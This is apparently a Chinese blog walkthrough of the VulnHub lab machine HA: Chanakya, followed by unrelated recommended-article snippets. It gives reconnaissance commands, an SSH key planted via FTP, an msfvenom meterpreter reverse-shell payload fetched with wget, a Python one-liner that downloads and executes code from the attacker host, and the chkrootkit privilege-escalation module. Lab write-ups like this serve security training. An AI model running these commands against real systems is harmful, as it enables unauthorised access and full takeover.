仅供个人娱乐

参考http://www.saulgoodman.cn/HA-Chanakya.html

靶机信息

https://www.vulnhub.com/entry/ha-chanakya,395/

一、主机探测

arp-scan -l

nmap -sV -p 1-65535 -A 192.168.236.136

dirb http://192.168.236.136

二、漏洞的查找和利用

百度   得到ROT13的加密方式

pcap流量包,直接下载即可

ashoka                             kautilya

首先进行21端口登录

22端口登陆失败

创建ssh-keygen

上传.ssh 使用kali免密登录

ssh-keygen

然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中

root@kali:~/桌面# cd ~/.ssh

root@kali:~/.ssh# cat id_rsa.pub > authorized_keys

mkdir .ssh

cd.ssh

put authorized_keys

root@kali:~/.ssh# ssh ashoka@192.168.236.136

提权

先msf生成一个木马反弹一个meterpreter回话过来

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf

python -m SimpleHTTPServer

msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.236.129

cd /tmp

wget http://192.168.236.129:8000/shell.elf

sysinfo

使用post模块来查看可以利用那些提权exploit:

run post/multi/recon/local_exploit_suggester

info exploit/linux/local/netfilter_priv_esc_ipv4

失败

使用命令注入来反弹一个shell:

use exploit/multi/script/web_delivery

set lhost 192.168.236.129

python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.236.129:8080/m9eTnBmiM');exec(r.read());"

在目标机运行:

使用rootkit攻击模块:

这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。

set rhosts 192.168.236.136

set session 1

set lport 8888

exploit

python -c'import pty;pty.spawn("/bin/bash")'

参考文章http://www.saulgoodman.cn/HA-Chanakya.html

chanakya的更多相关文章

  1. VulnHub靶场学习_HA: Chanakya

    HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...

  2. HA: Chanakya Vulnhub Walkthrough

    靶机链接: https://www.vulnhub.com/entry/ha-chanakya,395/ 网络主机探测: 主机端口扫描: nmap -p- -sC -sV 10.10.202.136 ...

随机推荐

  1. NOIP模拟测试39,思维禁锢专场「工业题·玄学题·卡常题」

    工业题 题解 抱歉,题解没时间写了 代码 #include<bits/stdc++.h> using namespace std; #define ll long long #define ...

  2. 数位dp从会打模板到不会打模板

    打了几个数位$dp$,发现自己除了会打模板之外没有任何长进,遇到非模板题依然什么都不会 那么接下来这篇文章将介绍如何打模板(滑稽) 假设我们要处理$l----r$ 采用记忆化搜索的方式,枚举$< ...

  3. Centos8.3、proxysql2.0读写分离实战记录

    接着主从复制继续往下讲,这个项目中我是使用proxysql做读写分离的中间件,之前是使用mycat.老实说mycat属于比较重量级的中间件,1.0还好到了2.0配置变得很复杂而且文档不是很齐全,我看着 ...

  4. Tomcat与spring的类加载器案例

    Tomcat与spring的类加载器案例接下来将介绍<深入理解java虚拟机>一书中的案例,并解答它所提出的问题.(部分类容来自于书中原文) Tomcat中的类加载器在Tomcat目录结构 ...

  5. N沟通场效应管深度图解(1)工作原理及Multisim实例仿真

    场效应晶体管(Field Effect Transistor, FET)简称场效应管,是一种由多数载流子参与导电的半导体器件,也称为单极型晶体管,它主要分型场效应管(Junction FET, JFE ...

  6. Golang修改操作系统时间

    Golang修改操作系统时间 需求 程序有时需要和服务器对时,发现延迟过高修改本地时间,这段代码网上抄的,实测可用,windows环境需要以管理员身份启动命令提示符调试 实现Demo package ...

  7. 利用 V8 深入理解 JavaScript 设计

    JavaScript 代码运行 以大家开发常用的 chrome 浏览器或 Node 举例,我们的 JavaScript 代码是通过 V8 运行的.但 V8 是怎么执行代码的呢?当我们输入 const ...

  8. 24 shell 管道命令与过滤器

    1.管道命令的用法 2.使用管道命令的好处: 3.重定向和管道的区别 4.Linux管道实例 5.管道与重定向 1)管道与输入重定向 2)管道与输出重定向 6.过滤器 7.过滤器举栗 1.管道命令的用 ...

  9. tcp三次握手四次挥手----转

    序列号seq:占4个字节,用来标记数据段的顺序,TCP把连接中发送的所有数据字节都编上一个序号,第一个字节的编号由本地随机产生:给字节编上序号后,就给每一个报文段指派一个序号:序列号seq就是这个报文 ...

  10. Java基础——自己的总结

    Java Java是什么? Java是一门面向对象编程语言,不仅吸收了C++语言的各种优点,还摒弃了C++里难以理解的多继承.指针等概念,因此Java语言具有功能强大和简单易用两个特征.Java语言作 ...